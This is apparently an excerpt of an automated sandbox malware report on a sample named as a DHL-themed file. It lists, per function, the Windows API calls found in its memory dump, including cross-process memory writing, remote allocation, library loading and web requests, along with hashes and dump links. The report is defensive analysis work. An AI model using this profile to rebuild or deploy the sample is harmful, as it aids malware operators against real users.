                                                                                          • Part of subcall function 00C614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C59296,?,?,00000034,00000800,?,00000034), ref: 00C614E6
                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C5983F
                                                                                          • Part of subcall function 00C61487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C614B1
                                                                                          • Part of subcall function 00C613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00C61409
                                                                                          • Part of subcall function 00C613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C5925A,00000034,?,?,00001004,00000000,00000000), ref: 00C61419
                                                                                          • Part of subcall function 00C613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C5925A,00000034,?,?,00001004,00000000,00000000), ref: 00C6142F
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C598AC
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C598F9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @$@U=u
                                                                                        • API String ID: 4150878124-826235744
                                                                                        • Opcode ID: b2ffbcd7788e191d30a11c2a0b9cc706e33a530029ad00ad290f97a9baa5bd35
                                                                                        • Instruction ID: b869391ff22ac6798eab2a6c77cfafeb4c748dc147028df3b932a882593c8320
                                                                                        • Opcode Fuzzy Hash: b2ffbcd7788e191d30a11c2a0b9cc706e33a530029ad00ad290f97a9baa5bd35
                                                                                        • Instruction Fuzzy Hash: 4441417690021CBFDB20DFA4CC81ADEBBB8EB05301F144199F955B7191DA716F89DBA0
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C5D5D4
                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C5D60A
                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C5D61B
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C5D69D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                        • String ID: DllGetClassObject
                                                                                        • API String ID: 753597075-1075368562
                                                                                        • Opcode ID: 1c53f2edbadf03f02da56e674cc14511652548c7951dd4fc3f6722e3b6b6de31
                                                                                        • Instruction ID: 5691dba65d84f0172556d1885ccf812d5f1da2fb3145bf888523730f18d8fbf6
                                                                                        • Opcode Fuzzy Hash: 1c53f2edbadf03f02da56e674cc14511652548c7951dd4fc3f6722e3b6b6de31
                                                                                        • Instruction Fuzzy Hash: 464192B5500304EFDF24DF14C888B9A7BA9EF44311F1585A9BC0ADF205DBB0DA89CBA4
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C627C0
                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C627DC
                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00C62822
                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CC5890,00000000), ref: 00C6286B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1173514356-4108050209
                                                                                        • Opcode ID: 89f0490904a01f0e888dd50ed8d8ef7a465a99879aaff0a92f3d3bd062143888
                                                                                        • Instruction ID: 39e6117a3f5fe28618e6bee712391039c396ad7fe4f2d865bdeddc5b0604c20f
                                                                                        • Opcode Fuzzy Hash: 89f0490904a01f0e888dd50ed8d8ef7a465a99879aaff0a92f3d3bd062143888
                                                                                        • Instruction Fuzzy Hash: 8141AE726047019FD724DF28CC84F1ABBE8EF89314F044A2DF9A5972D1D730A905DB62
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C888DE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 634782764-2594219639
                                                                                        • Opcode ID: 4a567e3bb0ab131e611db880b4fd9af097286ca3b1e2911c50befee7de83fec0
                                                                                        • Instruction ID: ac17d0fb24d682155836527c7c4fc2bdfaa1f6537520579a559dec1ba2114caa
                                                                                        • Opcode Fuzzy Hash: 4a567e3bb0ab131e611db880b4fd9af097286ca3b1e2911c50befee7de83fec0
                                                                                        • Instruction Fuzzy Hash: 3D31F634600109AFEF20BA58CC45FBD77A4EB0A328FD44115FA21D69E1CE31EA88975E
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C7D7C5
                                                                                          • Part of subcall function 00C0784B: _memmove.LIBCMT ref: 00C07899
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower_memmove
                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                        • API String ID: 3425801089-567219261
                                                                                        • Opcode ID: 7e06c2563370acce8d73a00cedc55b8fcf7c05956e0bae0dbe733b1e4b00e80c
                                                                                        • Instruction ID: aa59bb8f1a792e559daddcec1ee35dcd71d9ef4ff59c017062cc6aed33d82774
                                                                                        • Opcode Fuzzy Hash: 7e06c2563370acce8d73a00cedc55b8fcf7c05956e0bae0dbe733b1e4b00e80c
                                                                                        • Instruction Fuzzy Hash: E8318171904615AFCF04EF54C8919EEB3B5FF04320F108629F87A976D2DB71A905DB80
                                                                                        APIs
                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C7184C
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C71872
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C718A2
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00C718E9
                                                                                          • Part of subcall function 00C72483: GetLastError.KERNEL32(?,?,00C71817,00000000,00000000,00000001), ref: 00C72498
                                                                                          • Part of subcall function 00C72483: SetEvent.KERNEL32(?,?,00C71817,00000000,00000000,00000001), ref: 00C724AD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                        • String ID:
                                                                                        • API String ID: 3113390036-3916222277
                                                                                        • Opcode ID: a5cce7fdea7b0a5a15f682bb01ea9581c0106ff4695537fcef9b90590336da51
                                                                                        • Instruction ID: 327ae86b2f84ecf436de1d846127edd8af97d34f850c85bfd7b79d147743d8cf
                                                                                        • Opcode Fuzzy Hash: a5cce7fdea7b0a5a15f682bb01ea9581c0106ff4695537fcef9b90590336da51
                                                                                        • Instruction Fuzzy Hash: 7921D0B1500208BFEB119F69DC85FBF77ECEB48744F14812AF80996180DA249E0567A1
                                                                                        APIs
                                                                                          • Part of subcall function 00C01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C01D73
                                                                                          • Part of subcall function 00C01D35: GetStockObject.GDI32(00000011), ref: 00C01D87
                                                                                          • Part of subcall function 00C01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C01D91
                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C86461
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00C86468
                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C8647D
                                                                                        • DestroyWindow.USER32(?), ref: 00C86485
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                        • String ID: SysAnimate32
                                                                                        • API String ID: 4146253029-1011021900
                                                                                        • Opcode ID: 28124339367acb0a6400c9e93e6ad93f15c0b1fee7a716040a3eeafc6dcc25c3
                                                                                        • Instruction ID: c478f72ebd37585535961e5ad684dce6d4ef9b9e84258e58d36986edd9ca823c
                                                                                        • Opcode Fuzzy Hash: 28124339367acb0a6400c9e93e6ad93f15c0b1fee7a716040a3eeafc6dcc25c3
                                                                                        • Instruction Fuzzy Hash: BF218E71110215ABEF10AF64DC80FBF77A9EB98328F204629FA20921A0D771DC41A768
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00C66DBC
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C66DEF
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00C66E01
                                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C66E3B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: c62d107564fa33a96edfc7cdfbafb7628a907751031946c7b717637f613d3b9e
                                                                                        • Instruction ID: f16110ce7e84c00bafd6e213a304c29efd9c423e3ceb07678237acc88e814637
                                                                                        • Opcode Fuzzy Hash: c62d107564fa33a96edfc7cdfbafb7628a907751031946c7b717637f613d3b9e
                                                                                        • Instruction Fuzzy Hash: 0F21AC74600209ABDB309F29DC85B9E7BE8EF44720F204A29FCA0D72D0DB719A11CB54
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00C66E89
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C66EBB
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00C66ECC
                                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C66F06
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: aafd94e36c0bc6b0aa5ae81781f8d29fb96b9648ded7f3e4a4a3b7e40466c496
                                                                                        • Instruction ID: 6386281cb7f588992e13d062efee0a79fda7cfd605c858513604a5ccf747f99f
                                                                                        • Opcode Fuzzy Hash: aafd94e36c0bc6b0aa5ae81781f8d29fb96b9648ded7f3e4a4a3b7e40466c496
                                                                                        • Instruction Fuzzy Hash: FA21AF79600705ABDB309F69DC84BAA77A8EF45720F200B19FCB1E72D0DB71A951CB60
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00C6AC54
                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C6ACA8
                                                                                        • __swprintf.LIBCMT ref: 00C6ACC1
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00C8F910), ref: 00C6ACFF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                        • String ID: %lu
                                                                                        • API String ID: 3164766367-685833217
                                                                                        • Opcode ID: 8d729be049e523750620e07a8b73b145eeba87e28674bbb36841271c4abf949c
                                                                                        • Instruction ID: 3ddf779deb78782a6edf922ec003b82c5f00dee3d0784d67e75c0798694dea10
                                                                                        • Opcode Fuzzy Hash: 8d729be049e523750620e07a8b73b145eeba87e28674bbb36841271c4abf949c
                                                                                        • Instruction Fuzzy Hash: 3B217131A00109AFCB10EF65C985EAE7BB8FF49314B0040A9F909EB252DA31EA41DB21
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00C61B19
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                        • API String ID: 3964851224-769500911
                                                                                        • Opcode ID: 2d34998fec51b00107b99dc27e02d312fb960563ed4e04e9151ce17f57841c73
                                                                                        • Instruction ID: cb9c23233bffa17896f2511f265b9ef280dcf832c68cb6f76336ac70e0aaace6
                                                                                        • Opcode Fuzzy Hash: 2d34998fec51b00107b99dc27e02d312fb960563ed4e04e9151ce17f57841c73
                                                                                        • Instruction Fuzzy Hash: DD1161B0900118CFCF10EF94D8919FEB7B4FF65304F584469D825A7692EB325D0AEB50
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C7EC07
                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C7EC37
                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C7ED6A
                                                                                        • CloseHandle.KERNEL32(?), ref: 00C7EDEB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2364364464-0
                                                                                        • Opcode ID: c36ced11bdb13a8fa317b0accda4cb5fda18d5fcb83004d3b33c8d9a31aba803
                                                                                        • Instruction ID: 12fc103e2420aea773b6af2e2f6f23da46bbefb5cda336aa65822799b54f9a39
                                                                                        • Opcode Fuzzy Hash: c36ced11bdb13a8fa317b0accda4cb5fda18d5fcb83004d3b33c8d9a31aba803
                                                                                        • Instruction Fuzzy Hash: 23816CB16047019FD720EF28C886B2AB7E5EF58710F04C95DF9A99B3D2DAB0AD40CB55
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 1559183368-0
                                                                                        • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                        • Instruction ID: d2fd06acabef0982da95313ba6e710723e3d49f1939fb1b323fa87153bd4c263
                                                                                        • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                        • Instruction Fuzzy Hash: C851C471A00B25DBCB24DF69F88066FB7A6AF40325F248739F83596AD0D770DE909B40
                                                                                        APIs
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                          • Part of subcall function 00C80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7FDAD,?,?), ref: 00C80E31
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C800FD
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C8013C
                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C80183
                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00C801AF
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C801BC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 3440857362-0
                                                                                        • Opcode ID: f65671772f2b4e5f5c7f64b66064be9b9cd9385531cc2cee4af6020c69891cca
                                                                                        • Instruction ID: e6fc002380ddf4da183c5ed34c136ae02c9e792aeb4f6978a13d86b64ef7a339
                                                                                        • Opcode Fuzzy Hash: f65671772f2b4e5f5c7f64b66064be9b9cd9385531cc2cee4af6020c69891cca
                                                                                        • Instruction Fuzzy Hash: 8F517B31208204AFC704EF58C885F6EB7E8FF84318F50892DF596872A2DB31E949DB56
                                                                                        APIs
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C7D927
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00C7D9AA
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C7D9C6
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00C7DA07
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C7DA21
                                                                                          • Part of subcall function 00C05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C67896,?,?,00000000), ref: 00C05A2C
                                                                                          • Part of subcall function 00C05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C67896,?,?,00000000,?,?), ref: 00C05A50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 327935632-0
                                                                                        • Opcode ID: 1a00b8317c346872ab09b5373bc95bd7de30e441ea033b9e74b97736d2fd6d95
                                                                                        • Instruction ID: 392d9bcc34d5cc8c4c675335c3fc83956b87abcad1238fa7df1a90715189ed4c
                                                                                        • Opcode Fuzzy Hash: 1a00b8317c346872ab09b5373bc95bd7de30e441ea033b9e74b97736d2fd6d95
